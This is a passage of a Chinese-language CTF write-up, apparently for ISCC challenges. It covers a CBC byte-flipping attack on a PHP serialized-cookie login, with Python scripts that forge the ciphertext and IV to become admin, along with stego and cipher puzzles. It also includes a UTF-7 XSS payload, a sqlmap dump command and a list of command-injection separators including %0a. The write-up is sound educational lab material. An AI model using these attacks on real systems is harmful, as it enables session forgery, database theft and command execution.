class="string">"................"</span>);</span><br><span class="line">define(<span class="string">"METHOD"</span>, <span class="string">"aes-128-cbc"</span>);</span><br><span class="line">session_start();</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">get_random_iv</span><span class="params">()</span></span>&#123;</span><br><span class="line">    $iv=<span class="string">''</span>;</span><br><span class="line">    <span class="keyword">for</span>($i=<span class="number">0</span>;$i&lt;<span class="number">16</span>;$i++)&#123;</span><br><span class="line">        $iv.=chr(rand(<span class="number">1</span>,<span class="number">255</span>));</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">return</span> $iv;</span><br><span class="line">&#125;</span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">login</span><span class="params">($info)</span></span>&#123;</span><br><span class="line">    $iv=get_random_iv();</span><br><span class="line">    $plain = serialize($info);</span><br><span class="line">    $cipher = openssl_encrypt($plain, METHOD, SECRET_KEY, OPENSSL_RAW_DATA, $iv);</span><br><span class="line">    $_SESSION[<span class="string">'username'</span>] = $info[<span class="string">'username'</span>];</span><br><span class="line">    setcookie(<span class="string">"iv"</span>, base64_encode($iv));</span><br><span class="line">    setcookie(<span class="string">"cipher"</span>, base64_encode($cipher));</span><br><span class="line">&#125;</span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">show_homepage</span><span class="params">()</span></span>&#123;</span><br><span class="line">    <span class="keyword">if</span> ($_SESSION[<span class="string">"username"</span>]===<span class="string">'admin'</span>)&#123;</span><br><span class="line">        <span class="keyword">echo</span> <span class="string">'&lt;p&gt;Hello admin&lt;/p&gt;'</span>;</span><br><span class="line">        <span class="keyword">echo</span> <span class="string">'&lt;p&gt;Flag is *************&lt;/p&gt;'</span>;</span><br><span class="line">    &#125;<span class="keyword">else</span>&#123;</span><br><span class="line">        <span class="keyword">echo</span> <span class="string">'&lt;p&gt;hello '</span>.$_SESSION[<span class="string">'username'</span>].<span class="string">'&lt;/p&gt;'</span>;</span><br><span class="line">        <span class="keyword">echo</span> <span class="string">'&lt;p&gt;Only admin can see flag&lt;/p&gt;'</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">'&lt;p&gt;&lt;a href="loginout.php"&gt;Log out&lt;/a&gt;&lt;/p&gt;'</span>;</span><br><span class="line">    <span class="keyword">die</span>();</span><br><span class="line">&#125;</span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">check_login</span><span class="params">()</span></span>&#123;</span><br><span class="line">    <span class="keyword">if</span>(<span class="keyword">isset</span>($_COOKIE[<span class="string">'cipher'</span>]) &amp;&amp; <span class="keyword">isset</span>($_COOKIE[<span class="string">'iv'</span>]))&#123;</span><br><span class="line">        $cipher = base64_decode($_COOKIE[<span class="string">'cipher'</span>]);</span><br><span class="line">        $iv = base64_decode($_COOKIE[<span class="string">"iv"</span>]);</span><br><span class="line">        <span class="keyword">if</span>($plain = openssl_decrypt($cipher, METHOD, SECRET_KEY, OPENSSL_RAW_DATA, $iv))&#123;</span><br><span class="line">            $info = unserialize($plain) <span class="keyword">or</span> <span class="keyword">die</span>(<span class="string">"&lt;p&gt;base64_decode('"</span>.base64_encode($plain).<span class="string">"') can't unserialize&lt;/p&gt;"</span>);</span><br><span class="line">            $_SESSION[<span class="string">'username'</span>] = $info[<span class="string">'username'</span>];</span><br><span class="line">        &#125;<span class="keyword">else</span>&#123;</span><br><span class="line">            <span class="keyword">die</span>(<span class="string">"ERROR!"</span>);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>($_POST[<span class="string">'username'</span>])&amp;&amp;<span class="keyword">isset</span>($_POST[<span class="string">'password'</span>])) &#123;</span><br><span class="line">  $username=waf((string)$_POST[<span class="string">'username'</span>]);</span><br><span class="line">  $password=waf((string)$_POST[<span class="string">'password'</span>]);</span><br><span class="line">  <span class="keyword">if</span>($username === <span class="string">'admin'</span>)&#123;</span><br><span class="line">        <span class="keyword">exit</span>(<span class="string">'&lt;p&gt;You are not real admin!&lt;/p&gt;'</span>);</span><br><span class="line">    &#125;<span class="keyword">else</span>&#123;</span><br><span class="line">        $info = <span class="keyword">array</span>(<span class="string">'username'</span>=&gt;$username,<span class="string">'password'</span>=&gt;$password);</span><br><span class="line">        login($info);</span><br><span class="line">        show_homepage();</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">else</span>&#123;</span><br><span class="line">  <span class="keyword">if</span>(<span class="keyword">isset</span>($_SESSION[<span class="string">"username"</span>]))&#123;</span><br><span class="line">        check_login();</span><br><span class="line">        show_homepage();</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br><span class="line">&lt;!DOCTYPE html&gt;</span><br><span class="line">&lt;html lang=<span class="string">"en"</span> &gt;</span><br><span class="line">&lt;head&gt;</span><br><span class="line">  &lt;meta charset=<span class="string">"UTF-8"</span>&gt;</span><br><span class="line">  &lt;title&gt;Paper login form&lt;/title&gt;</span><br><span class="line">      &lt;link rel=<span class="string">"stylesheet"</span> href=<span class="string">"css/style.css"</span>&gt;</span><br><span class="line">&lt;/head&gt;</span><br><span class="line">&lt;body&gt;</span><br><span class="line">  &lt;div id=<span class="string">"login"</span>&gt;</span><br><span class="line">  &lt;form action=<span class="string">""</span> method=<span class="string">"post"</span>&gt;</span><br><span class="line">    &lt;h1&gt;Sign In&lt;/h1&gt;</span><br><span class="line">    &lt;input name=<span class="string">'username'</span> type=<span class="string">"text"</span> placeholder=<span class="string">"Username"</span>&gt;</span><br><span class="line">    &lt;input name=<span class="string">'password'</span> type=<span class="string">"password"</span> placeholder=<span class="string">"Password"</span>&gt;</span><br><span class="line">    &lt;button&gt;Sign in&lt;/button&gt;</span><br><span class="line">&lt;/div&gt;</span><br><span class="line">&lt;/body&gt;</span><br><span class="line">&lt;/html&gt;</span><br></pre></td></tr></table></figure>
<p>类似题目 <a href="http://p0sec.net/index.php/archives/99/" target="_blank" rel="noopener">cbc字节翻转攻击</a></p>
<p>​</p>
<p>此攻击方法的精髓在于：<strong>通过损坏密文字节来改变明文字节</strong>。（注：借助CBC内部的模式）借由此可以绕过过滤器，或者改变用户权限提升至管理员，又或者改变应用程序预期明文以尽猥琐之事。</p>
<p>CBC字节翻转攻击发生在解密的过程中，实质就是通过更改上一个块的内容，来间接修改明文中的内容。有一条经验法则是(结合上图)，你在密文中改变的字节，<strong>只</strong>会影响到在下一明文当中，具有相同偏移量的字节。因此，进行CBC攻击仅影响到两个块。CBC反转攻击的用途主要体现在在不知道加密密钥的情况下，通过修改密文，可以间接修改明文。</p>
<p><a href="https://ohduknodm.qnssl.com/20170525149569330192390.jpg" target="_blank" rel="noopener"><img src="https://ohduknodm.qnssl.com/20170525149569330192390.jpg" alt="20170525149569330192390.jpg"></a></p>
<p>回到题目中来，序列化后的明文如下：</p>
<p><code>a:2:{s:8:&quot;username&quot;;s:5:&quot;bdmin&quot;;s:8:&quot;password&quot;;s:5:&quot;admin&quot;;</code></p>
<ol>
<li>首先将明文分成16字节的四组：</li>
</ol>
<ul>
<li>a:2:{s:8:”userna</li>
<li>me”;s:5:”bdmin”;</li>
<li>s:8:”password”;s</li>
<li>:5:”admin”;}</li>
</ul>
<ol>
<li><p>修改cipher1</p>
<p><img src="13.png" alt=""></p>
</li>
</ol>
<figure class="highlight erlang"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">cipher1 <span class="keyword">xor</span> plain2 = middle2</span><br><span class="line">cipher1 = middle2 <span class="keyword">xor</span> plain2</span><br><span class="line">cipher1_change = middle2 <span class="keyword">xor</span> plain_change = cipher1 <span class="keyword">xor</span> plain2 <span class="keyword">xor</span> plain2_change</span><br><span class="line">对应下面代码中的</span><br><span class="line"><span class="function"><span class="title">ord</span><span class="params">(cipher[i])</span> ^ <span class="title">ord</span><span class="params">(plain_old[i])</span> ^ <span class="title">ord</span><span class="params">(plain_new[i])</span></span></span><br></pre></td></tr></table></figure>
<ol>
<li>恢复iv</li>
</ol>
<p>出现了问题，修改cipher1,又会破坏plain1的解密，题目中plain1_error通过错误回显已知，iv可控，于是可以通过修改IV值恢复plain1。</p>
<figure class="highlight ini"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="attr">plain_error</span> = middle1 xor iv_old</span><br><span class="line"><span class="attr">middle1</span> = plain_error xor iv_old</span><br><span class="line"><span class="attr">iv_new</span> = middle1 xor plain1 = plain_error xor iv_old xor plain1​</span><br></pre></td></tr></table></figure>
<p>代码如下：</p>
<ul>
<li>重新生成密文</li>
</ul>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># -*- coding: utf-8 -*-</span></span><br><span class="line"><span class="keyword">import</span> base64</span><br><span class="line">cipher1 = <span class="string">'EvX06IpeOJ9iTJ7J1L9iP7ymKC1Phg7KySWJP0ZbAtlwVMnniIkdvRH60+BY5g+8i0WKbQvgJIZVbGsQGTzH5A=='</span>.decode(<span class="string">'base64'</span>)</span><br><span class="line">plain_old = <span class="string">"me\";s:5:\"skctf\";"</span></span><br><span class="line">plain_new = <span class="string">"me\";s:5:\"admin\";"</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> xrange(<span class="number">16</span>):</span><br><span class="line">  cipher_change = cipher[:i] + chr(ord(cipher1[i]) ^ ord(plain_old[i]) ^ ord(plain_new[i])) + cipher1[i+<span class="number">1</span>:]</span><br><span class="line"></span><br><span class="line"><span class="keyword">print</span> cipher_change.encode(<span class="string">'base64'</span>)</span><br></pre></td></tr></table></figure>
<ul>
<li>重新生成IV</li>
</ul>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># -*- coding: utf-8 -*-</span></span><br><span class="line"><span class="keyword">import</span> base64</span><br><span class="line"></span><br><span class="line">plain = <span class="string">'tjxwLb7ntUZzvvEfoiiKKG1lIjtzOjU6ImFkbWluIjtzOjg6InBhc3N3b3JkIjtzOjU6InNrY3RmIjt9'</span>.decode(<span class="string">'base64'</span>)</span><br><span class="line">iv = <span class="string">'in+Lglg80v0qJ2PW/c11pg=='</span>.decode(<span class="string">'base64'</span>)</span><br><span class="line"></span><br><span class="line">old = plain[:<span class="number">16</span>]</span><br><span class="line">new = <span class="string">"a:2:&#123;s:8:\"userna"</span>;</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> xrange(<span class="number">16</span>):</span><br><span class="line">    iv = iv[:i] + chr(ord(iv[i]) ^ ord(old[i]) ^ ord(new[i])) + iv[i+<span class="number">1</span>:]</span><br><span class="line"></span><br><span class="line"><span class="keyword">print</span> iv.encode(<span class="string">'base64'</span>).strip()​</span><br></pre></td></tr></table></figure>
<h3 id="What-is-that？"><a href="#What-is-that？" class="headerlink" title="What is that？"></a>What is that？</h3><p>发现一张图片，23333,markdown语法竟然不能显示出来，估计就是crc校验有问题了，修改后面的高度</p>
<p><img src="11.png" alt=""></p>
<p>​</p>
<p>得到</p>
<p><img src="WhatIsThat.png" alt=""></p>
<p>​</p>
<h3 id="数字密文"><a href="#数字密文" class="headerlink" title="数字密文"></a>数字密文</h3><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># -*- Coding:UTF-8 -*-</span></span><br><span class="line"></span><br><span class="line">a = [<span class="string">"0x69"</span>,<span class="string">"0x74"</span>,<span class="string">"0x27"</span>,<span class="string">"0x73"</span>,<span class="string">"0x20"</span>,<span class="string">"0x65"</span>,<span class="string">"0x61"</span>,<span class="string">"0x73"</span>,<span class="string">"0x79"</span>,<span class="string">"0x21"</span>]</span><br><span class="line">str = <span class="string">""</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> a:</span><br><span class="line">	str += chr(int(i,<span class="number">16</span>))</span><br><span class="line"></span><br><span class="line"><span class="keyword">print</span> str</span><br></pre></td></tr></table></figure>
<p>或者利用 “一只猫的心思”的脚本</p>
<p>flag: it’s easy!</p>
<h3 id="秘密电报"><a href="#秘密电报" class="headerlink" title="秘密电报"></a>秘密电报</h3><p>题目：</p>
<p>秘密电报：<br>知识就是力量 ABAAAABABBABAAAABABAAABAAABAAABAABAAAABAAAABA</p>
<p>“知识就是力量”这句话是培根说的，于是培根密码解密得到flag:ILIKEISCC</p>
</li>
</ul>
<h3 id="谍影重重"><a href="#谍影重重" class="headerlink" title="谍影重重"></a>谍影重重</h3><p>这道题是在师兄的帮助下完成的</p>
<p>前面各种base64解码和urldecode得到</p>
<figure class="highlight smali"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">U2FsdGVkX183BPnBd50ynIRM3o8YLmwHaoi8b8QvfVdFHCEwG9iwp4hJHznrl7d4</span><br><span class="line">B5rKClEyYVtx6uZFIKtCXo71fR9Mcf6b0EzejhZ4pnhnJOl+zrZVlV0T9NUA+u1z</span><br><span class="line">iN+jkpb6ERH86j7t45v4Mpe+j1gCpvaQgoKC0Oaa5kc=</span><br></pre></td></tr></table></figure>
<p>再解码得到:</p>
<p><img src="5.png" alt=""></p>
<p><code>Salt__</code>是openssl加密后的标志</p>
<p><a href="http://tool.oschina.net/encrypt/" target="_blank" rel="noopener">在线解密</a>解密结果：</p>
<p>答案就是后面这句但已加密<br>缽娑遠呐者若奢顛悉呐集梵提梵蒙夢怯倒耶哆般究有栗</p>
<p><a href="http://www.keyfc.net/bbs/tools/tudoucode.aspx" target="_blank" rel="noopener">佛论禅</a>解密：</p>
<blockquote>
<p>把以“佛曰:”开头的内容，复制粘贴到密文区后，点击“参悟佛所言的真意”按钮，就能在上面的明文区看到解码后的字符了。</p>
</blockquote>
<p>在密文前面加上”佛曰”,解密得到：把我复制走</p>
<p>flag: 把我复制走</p>
<h3 id="有趣的ISCC"><a href="#有趣的ISCC" class="headerlink" title="有趣的ISCC"></a>有趣的ISCC</h3><p>010Editor打开图片发现文件尾<code>AE 42 60 82</code>后面有一些类似unicode编码的东西,去掉多余的空字节后得到</p>
<figure class="highlight cal"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&amp;<span class="string">#92</span>;&amp;<span class="string">#117</span>;&amp;<span class="string">#48</span>;&amp;<span class="string">#48</span>;&amp;<span class="string">#54</span>;&amp;<span class="string">#54</span>;&amp;<span class="string">#92</span>;&amp;<span class="string">#117</span>;&amp;<span class="string">#48</span>;&amp;<span class="string">#48</span>;&amp;<span class="string">#54</span>;&amp;<span class="string">#99</span>;&amp;<span class="string">#92</span>;&amp;<span class="string">#117</span>;&amp;<span class="string">#48</span>;&amp;<span class="string">#48</span>;&amp;<span class="string">#54</span>;&amp;<span class="string">#49</span>;&amp;<span class="string">#92</span>;&amp;<span class="string">#117</span>;&amp;<span class="string">#48</span>;&amp;<span class="string">#48</span>;&amp;<span class="string">#54</span>;&amp;<span class="string">#55</span>;&amp;<span class="string">#92</span>;&amp;<span class="string">#117</span>;&amp;<span class="string">#48</span>;&amp;<span class="string">#48</span>;&amp;<span class="string">#55</span>;&amp;<span class="string">#98</span>;&amp;<span class="string">#92</span>;&amp;<span class="string">#117</span>;&amp;<span class="string">#48</span>;&amp;<span class="string">#48</span>;&amp;<span class="string">#54</span>;&amp;<span class="string">#57</span>;&amp;<span class="string">#92</span>;&amp;<span class="string">#117</span>;&amp;<span class="string">#48</span>;&amp;<span class="string">#48</span>;&amp;<span class="string">#55</span>;&amp;<span class="string">#51</span>;&amp;<span class="string">#92</span>;&amp;<span class="string">#117</span>;&amp;<span class="string">#48</span>;&amp;<span class="string">#48</span>;&amp;<span class="string">#54</span>;&amp;<span class="string">#51</span>;&amp;<span class="string">#92</span>;&amp;<span class="string">#117</span>;&amp;<span class="string">#48</span>;&amp;<span class="string">#48</span>;&amp;<span class="string">#54</span>;&amp;<span class="string">#51</span>;&amp;<span class="string">#92</span>;&amp;<span class="string">#117</span>;&amp;<span class="string">#48</span>;&amp;<span class="string">#48</span>;&amp;<span class="string">#50</span>;&amp;<span class="string">#48</span>;&amp;<span class="string">#92</span>;&amp;<span class="string">#117</span>;&amp;<span class="string">#48</span>;&amp;<span class="string">#48</span>;&amp;<span class="string">#54</span>;&amp;<span class="string">#57</span>;&amp;<span class="string">#92</span>;&amp;<span class="string">#117</span>;&amp;<span class="string">#48</span>;&amp;<span class="string">#48</span>;&amp;<span class="string">#55</span>;&amp;<span class="string">#51</span>;&amp;<span class="string">#92</span>;&amp;<span class="string">#117</span>;&amp;<span class="string">#48</span>;&amp;<span class="string">#48</span>;&amp;<span class="string">#50</span>;&amp;<span class="string">#48</span>;&amp;<span class="string">#92</span>;&amp;<span class="string">#117</span>;&amp;<span class="string">#48</span>;&amp;<span class="string">#48</span>;&amp;<span class="string">#54</span>;&amp;<span class="string">#54</span>;&amp;<span class="string">#92</span>;&amp;<span class="string">#117</span>;&amp;<span class="string">#48</span>;&amp;<span class="string">#48</span>;&amp;<span class="string">#55</span>;&amp;<span class="string">#53</span>;&amp;<span class="string">#92</span>;&amp;<span class="string">#117</span>;&amp;<span class="string">#48</span>;&amp;<span class="string">#48</span>;&amp;<span class="string">#54</span>;&amp;<span class="string">#101</span>;&amp;<span class="string">#92</span>;&amp;<span class="string">#117</span>;&amp;<span class="string">#48</span>;&amp;<span class="string">#48</span>;&amp;<span class="string">#55</span>;&amp;<span class="string">#100</span>;</span><br></pre></td></tr></table></figure>
<p>于是先进行Unicode解码再转换为字符串</p>
<p><a href="http://www.atool.org/chinese2unicode.php" target="_blank" rel="noopener">中文汉字 | ASCII | Unicode互相转换工具</a></p>
<p><img src="6.png" alt=""></p>
<p>flag：iscc is fun</p>
<h3 id="凯撒十三世"><a href="#凯撒十三世" class="headerlink" title="凯撒十三世"></a>凯撒十三世</h3><p>题目描述：凯撒十三世在学会使用键盘后，向你扔了一串字符：“ebdgc697g95w3”，猜猜它吧。</p>
<p><a href="http://ctf.ssleye.com/rot13.html" target="_blank" rel="noopener">rot13</a></p>
<blockquote>
<p>ROT13 也是过去在古罗马开发的凯撒密码的一种变体。ROT13是它自身的逆反，即：要还原成原文只要使用同一算法即可得，故同样的操作可用于加密与解密。该算法并没有提供真正密码学上的保全，故它不应该被用于需要保全的用途上。它常常被当作弱加密示例的典型。</p>
</blockquote>
<p>得到: roqtp697t95j3</p>
<p>键盘密码: 仔细观察，可以发现是上下对应解密的，即qwerty解密后为asdfgh，看着键盘解密为flag:yougotme</p>
<h3 id="一只猫的心思"><a href="#一只猫的心思" class="headerlink" title="一只猫的心思"></a>一只猫的心思</h3><p>文件尾部<code>FF D9</code>得到word文档的头部<code>D0CF11E0</code>，截取出来存为doc文档，内容为:</p>
<p>名西三陵帝焰数诵诸山众參哈瑟倒陰捨劫奉惜逝定雙月奉倒放足即闍重号貧老诵夷經友利普过孕北至花令藐灯害蒙能羅福羅夢开雙禮琉德护慈積寫阿璃度戏便通故西故敬于瑟行雙知宇信在礙哈数及息闍殺陵游盧槃药諦慈灯究幽灯豆急彌貧豆親诵梭量树琉敬精者楞来西陰根五消夢众羅持造彌六师彌怖精僧璃夫薩竟祖方夢訶橋經文路困如牟憐急尼念忧戏輸教乾楞能敬告树来楞殊倒哈在紛除亿茶涅根輸持麼阿空瑟稳住濟号他方牟月息盡即来通貧竟怖如槃精老盡恤及游薩戏师毒兄宝下行普鄉释下告劫惜进施盡豆告心蒙紛信胜东蒙求帝金量礙故弟帝普劫夜利除積众老陀告沙師尊尼捨惜三依老蒙守精于排族祖在师利寫首念凉梭妙經栗穆愛憐孝粟尊醯造解住時刚槃宗解牟息在量下恐教众智焰便醯除寂想虚中顛老弥诸持山諦月真羅陵普槃下遠涅能开息灯和楞族根羅宝戒药印困求及想月涅能进至贤金難殊毘瑟六毘捨薩槃族施帝遠念众胜夜夢各万息尊薩山哈多皂诵盡药北及雙栗师幽持牟尼隸姪遠住孕寂以舍精花羅界去住勒排困多閦呼皂難于焰以栗婦愛闍多安逝告槃藐矜竟孕彌弟多者精师寡寫故璃舍各亦方特路茶豆積梭求号栗怖夷凉在顛豆胜住虚解鄉姪利琉三槃以舍劫鄉陀室普焰于鄉依朋故能劫通</p>
<p><a href="http://www.keyfc.net/bbs/tools/tudoucode.aspx" target="_blank" rel="noopener">佛论禅解码</a></p>
<p>注意：记得带上『佛曰：』或『如是我闻：』的文字，点击『参悟佛所言的真意』按钮</p>
<figure class="highlight dns"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">523156615245644</span>E536C564856544E565130354B553064524D6C524E546B4A56535655795645644F5530524857544A4553553943566B644A4D6C524E546C7052523155795645744F536C5248515670555330354452456456576B524854554A585231457956554E4F51305A4855544E4553303153566B64424D6C524A546B7058527A525A5245744F576C5A4854544A5554553554513063304E46524C54564A5652316B795255744F51305A4856544E5554564661566B6C464D6B5252546B70595231557A5245394E516C5A4856544A555355354B566B644E5756524E5455705752316B7A5255564F55305248566B465553564A4356306C4E4D6C524E546B4A565231557952453152556C564A56544A455555354B5530644E5756525054554A56523030795645314F516C5A4857544A4553303143566B64464D305648546B744352314A425645744F576C5A4855544A4651303543566B64564D6B524854554A555230557A52454E4F536C644855544A5554553543566B645A4D6B564A546C4E445231566152456C52576C5A4855544A5553303544516B64564D6C524C54564A55523045795245314F556C4A4856544E455355354B56556C564D6B564E546B70535230315A52457452536C564951544A555455354B565564535156524A54564A575230457956456C4E576C46485454525553303143566B6446576C5<span class="number">64A54544A46</span></span><br></pre></td></tr></table></figure>
<p><a href="https://www.sojson.com/hexadecimal.html" target="_blank" rel="noopener">16进制转字符串</a> ，接下来就是base64 base32 16进制转字符串等的操作得到<code>F1a9_is_I5cc_ZOl8_G3TP01NT</code> </p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># coding:UTF-8</span></span><br><span class="line"></span><br><span class="line"><span class="string">"""</span></span><br><span class="line"><span class="string">base64 中包含大写字母（A-Z）、小写字母（a-z）、数字0——9以及+/=；</span></span><br><span class="line"><span class="string">base32 中只有大写字母（A-Z）和数字234567=</span></span><br><span class="line"><span class="string">base16编码是一个标准的十六进制字符串（注意是字符串而不是数值）,只有数字0-9以及大写字母ABCDEF，更易被人类和计算机使用，因为它并不包含任何控制字符，以及Base64和Base32中的“=”符号</span></span><br><span class="line"><span class="string">"""</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> base64</span><br><span class="line"><span class="keyword">import</span> binascii</span><br><span class="line"><span class="keyword">import</span> re</span><br><span class="line"></span><br><span class="line"><span class="comment">#后期优化：输入各种不同的形式，如字符串，列表等，都可以正确解码</span></span><br><span class="line"></span><br><span class="line">str = <span class="string">'523156615245644E536C564856544E565130354B553064524D6C524E546B4A56535655795645644F5530524857544A4553553943566B644A4D6C524E546C7052523155795645744F536C5248515670555330354452456456576B524854554A585231457956554E4F51305A4855544E4553303153566B64424D6C524A546B7058527A525A5245744F576C5A4854544A5554553554513063304E46524C54564A5652316B795255744F51305A4856544E5554564661566B6C464D6B5252546B70595231557A5245394E516C5A4856544A555355354B566B644E5756524E5455705752316B7A5255564F55305248566B465553564A4356306C4E4D6C524E546B4A565231557952453152556C564A56544A455555354B5530644E5756525054554A56523030795645314F516C5A4857544A4553303143566B64464D305648546B744352314A425645744F576C5A4855544A4651303543566B64564D6B524854554A555230557A52454E4F536C644855544A5554553543566B645A4D6B564A546C4E445231566152456C52576C5A4855544A5553303544516B64564D6C524C54564A55523045795245314F556C4A4856544E455355354B56556C564D6B564E546B70535230315A52457452536C564951544A555455354B565564535156524A54564A575230457956456C4E576C46485454525553303143566B6446576C564A54544A46'</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">while</span> <span class="number">1</span>:</span><br><span class="line">	<span class="keyword">try</span>:</span><br><span class="line">		<span class="keyword">print</span> <span class="string">"[info]:"</span>+str</span><br><span class="line">		<span class="keyword">if</span> re.match(<span class="string">'^[A-F0-9=]+$'</span>, str):</span><br><span class="line">			str = base64.b16decode(str)</span><br><span class="line">		<span class="keyword">elif</span> re.match(<span class="string">'^[A-Z2-7=]+$'</span>,str):</span><br><span class="line">			str = base64.b32decode(str)</span><br><span class="line">		<span class="keyword">elif</span> str.find(<span class="string">'[a-z+/]'</span>):</span><br><span class="line">			str = base64.b64decode(str)</span><br><span class="line"></span><br><span class="line">	<span class="keyword">except</span> TypeError:</span><br><span class="line">		<span class="keyword">print</span> <span class="string">"[final] 解码完毕:"</span>+str</span><br><span class="line">		<span class="keyword">break</span></span><br></pre></td></tr></table></figure>
<p>flag: <code>I5cc_ZOl8_G3TP01NT</code> `</p>
<h3 id="暴力XX不可取"><a href="#暴力XX不可取" class="headerlink" title="暴力XX不可取"></a>暴力XX不可取</h3><p><img src="7.png" alt=""></p>
<p>成功打开flag.txt，得到<code>vfppjrnerpbzvat</code>，rot13解密后得到flag: isccwearecoming</p>
<h3 id="Where-is-the-FLAG？"><a href="#Where-is-the-FLAG？" class="headerlink" title="Where is the FLAG？"></a>Where is the FLAG？</h3><p>010 Editor打开发现图片经过Firework编辑得到，使用Firework打开发现隐藏的图层</p>
<p><img src="8.png" alt=""></p>
<p>按标号顺序排好得到正确的二维码</p>
<p><img src="9.png" alt=""></p>
<p>扫码得到flag：a332b700-3621-11e7-a53b-6807154a58cf</p>
<h3 id="你能跨过去吗"><a href="#你能跨过去吗" class="headerlink" title="你能跨过去吗"></a>你能跨过去吗</h3><p><code>http://www.test.com/NodeMore.jsp?id=672613&amp;page=2&amp;pageCounter=32&amp;undefined&amp;callback=%2b/v%2b%20%2bADwAcwBjAHIAaQBwAHQAPgBhAGwAZQByAHQAKAAiAGsAZQB5ADoALwAlAG4AcwBmAG8AYwB1AHMAWABTAFMAdABlAHMAdAAlAC8AIgApADwALwBzAGMAcgBpAHAAdAA%2bAC0-&amp;_=1302746925413</code></p>
<p>挺无语的一道题，不知道作者想表达什么，难道想告诉我们url有时会进行base64编码处理吗？</p>
<p>对<code>ADwAcwBjAHIAaQBwAHQAPgBhAGwAZQByAHQAKAAiAGsAZQB5ADoALwAlAG4AcwBmAG8AYwB1AHMAWABTAFMAdABlAHMAdAAlAC8AIgApADwALwBzAGMAcgBpAHAAdAA%2bAC0</code>解码得到</p>
<p><code>&lt;script&gt;alert(&quot;key:/%nsfocusXSStest%/&quot;)&lt;/script&gt;</code></p>
<p>表单页面输入:<code>/%nsfocusXSStest%/</code> ，得到flag: Hell0World</p>
<h3 id="Sqli"><a href="#Sqli" class="headerlink" title="Sqli"></a>Sqli</h3><p>很不光彩的用sqlmap跑出来的</p>
<figure class="highlight jboss-cli"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python .\sqlmap.py -r .\r.txt  <span class="params">--thread</span> 10 <span class="params">--level</span> 3 <span class="params">--dbms</span> <span class="string">"Mysql"</span> <span class="params">--dump</span></span><br></pre></td></tr></table></figure>
<p><img src="14.png" alt=""></p>
<h3 id="你能绕过吗"><a href="#你能绕过吗" class="headerlink" title="你能绕过吗?"></a>你能绕过吗?</h3><p>尝试了各种绕过的姿势</p>
<figure class="highlight lsl"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">1</span>）&amp;&amp;</span><br><span class="line"></span><br><span class="line"><span class="number">2</span>）||</span><br><span class="line"></span><br><span class="line"><span class="number">3</span>）;</span><br><span class="line"></span><br><span class="line"><span class="number">4</span>）&amp;</span><br><span class="line"></span><br><span class="line"><span class="number">5</span>）|</span><br><span class="line"></span><br><span class="line"><span class="number">6</span>）反引号执行命令</span><br></pre></td></tr></table></figure>
<p>灵活的绕过了正确答案<strong>%0a</strong>  心塞塞的……</p>
<hr>
